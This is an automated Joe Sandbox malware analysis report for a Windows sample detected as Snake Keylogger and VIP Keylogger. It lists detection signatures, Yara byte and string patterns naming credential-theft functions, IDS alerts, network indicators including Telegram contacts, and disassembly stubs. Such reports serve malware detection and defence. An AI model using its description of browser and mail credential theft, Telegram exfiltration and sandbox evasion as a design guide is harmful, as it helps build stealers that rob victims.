Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe

Overview

General Information

Sample name:173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
Analysis ID:1553323
MD5:c0dc27117e14576d09eeb3f5285890fd
SHA1:a635782cc229cc9d78ad2ca07232bc8a9d1e35ea
SHA256:e15f96a8007148677667e284c9047ac9928f979cdf06d371b776816df51ee480
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
No configs have been found
SourceRuleDescriptionAuthorStrings
173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
SourceRuleDescriptionAuthorStrings
00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x35d3a:$a1: get_encryptedPassword
          • 0x35d0e:$a2: get_encryptedUsername
          • 0x35dd2:$a3: get_timePasswordChanged
          • 0x35cea:$a4: get_passwordField
          • 0x35d50:$a5: set_encryptedPassword
          • 0x35b1d:$a7: get_logins
          • 0x313ad:$a10: KeyLoggerEventArgs
          • 0x3137c:$a11: KeyLoggerEventArgsEventHandler
          • 0x35bf1:$a13: _encryptedPassword
          Click to see the 22 entries
          SourceRuleDescriptionAuthorStrings
          0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0.0.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                Click to see the 75 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-10T21:44:15.144401+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449748TCP
                2024-11-10T21:44:53.944322+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449755TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-10T21:43:59.859447+010028033053Unknown Traffic192.168.2.449732188.114.97.3443TCP
                2024-11-10T21:44:06.393227+010028033053Unknown Traffic192.168.2.449740188.114.97.3443TCP
                2024-11-10T21:44:09.647704+010028033053Unknown Traffic192.168.2.449744188.114.97.3443TCP
                2024-11-10T21:44:11.687144+010028033053Unknown Traffic192.168.2.449746188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-10T21:43:56.804013+010028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                2024-11-10T21:43:59.132182+010028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                2024-11-10T21:44:00.757146+010028032742Potentially Bad Traffic192.168.2.449733193.122.6.16880TCP
                2024-11-10T21:44:02.397777+010028032742Potentially Bad Traffic192.168.2.449735193.122.6.16880TCP
                2024-11-10T21:44:04.054141+010028032742Potentially Bad Traffic192.168.2.449737193.122.6.16880TCP
                2024-11-10T21:44:05.679078+010028032742Potentially Bad Traffic192.168.2.449739193.122.6.16880TCP
                2024-11-10T21:44:07.288480+010028032742Potentially Bad Traffic192.168.2.449741193.122.6.16880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeAvira: detected
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeReversingLabs: Detection: 50%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: Binary string: _.pdb source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061C0D0Fh0_2_061C0B30
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061C1699h0_2_061C0B30
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CCF7Ch0_2_061CCCD0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061C2C3Ch0_2_061C2988
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061C3206h0_2_061C2DE8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CE0DCh0_2_061CDE30
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_061C0676
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CE534h0_2_061CE288
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CE98Ch0_2_061CE6E0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CEDE4h0_2_061CEB38
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CF23Ch0_2_061CEF90
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CF694h0_2_061CF3E8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_061C0856
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_061C0040
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CFAECh0_2_061CF840
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061C3206h0_2_061C3134
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CD3D4h0_2_061CD128
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CD82Ch0_2_061CD580
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061C3206h0_2_061C2DDE
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 061CDC84h0_2_061CD9D8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B8320h0_2_063B7FE0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BBA91h0_2_063BB7C0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B96F3h0_2_063B9420
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B02ECh0_2_063B0040
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BCCF1h0_2_063BCA20
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B1CFCh0_2_063B1A50
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BED19h0_2_063BEA48
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BD189h0_2_063BCEB8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B2154h0_2_063B1EA8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B712Ch0_2_063B6E80
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B4D2Ch0_2_063B4A80
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BF1B1h0_2_063BEEE0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B7584h0_2_063B72D8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B5184h0_2_063B4ED8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B55DCh0_2_063B5330
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B79DCh0_2_063B7730
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B25ACh0_2_063B2300
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BF649h0_2_063BF378
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B2A04h0_2_063B2758
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BD621h0_2_063BD350
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B2E5Ch0_2_063B2BB0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B5A34h0_2_063B5788
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B7E34h0_2_063B7B88
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BDAB9h0_2_063BD7E8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B5E8Ch0_2_063B5BE0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B62E4h0_2_063B6038
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BFAE1h0_2_063BF810
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B32B4h0_2_063B3008
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B370Ch0_2_063B3460
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BBF29h0_2_063BBC58
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B3B64h0_2_063B38B8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B0744h0_2_063B0498
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B673Ch0_2_063B6490
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BDF51h0_2_063BDC80
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B0B9Ch0_2_063B08F0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BC3C1h0_2_063BC0F0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B6B96h0_2_063B68E8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then mov esp, ebp0_2_063BB122
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BE3E9h0_2_063BE118
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B0FF4h0_2_063B0D48
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BE881h0_2_063BE5B0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B144Ch0_2_063B11A0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063BC859h0_2_063BC588
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 063B18A4h0_2_063B15F8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06426EB3h0_2_06426BB8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06420311h0_2_06420040
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642E63Bh0_2_0642E340
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06425A19h0_2_06425748
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06427843h0_2_06427548
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06424321h0_2_06424050
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642A34Bh0_2_0642A050
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642CE53h0_2_0642CB58
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06422C29h0_2_06422958
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642F95Bh0_2_0642F660
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06422312h0_2_06422068
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06428B63h0_2_06428868
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06420C41h0_2_06420970
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642B66Bh0_2_0642B370
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642E173h0_2_0642DE78
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06426349h0_2_06426078
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642BFFBh0_2_0642BD00
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064210D9h0_2_06420E08
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642EB03h0_2_0642E808
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06426882h0_2_06426510
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06427D0Bh0_2_06427A10
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064250EAh0_2_06424E18
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642A813h0_2_0642A518
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064239F1h0_2_06423720
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642D31Bh0_2_0642D020
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642902Bh0_2_06428D30
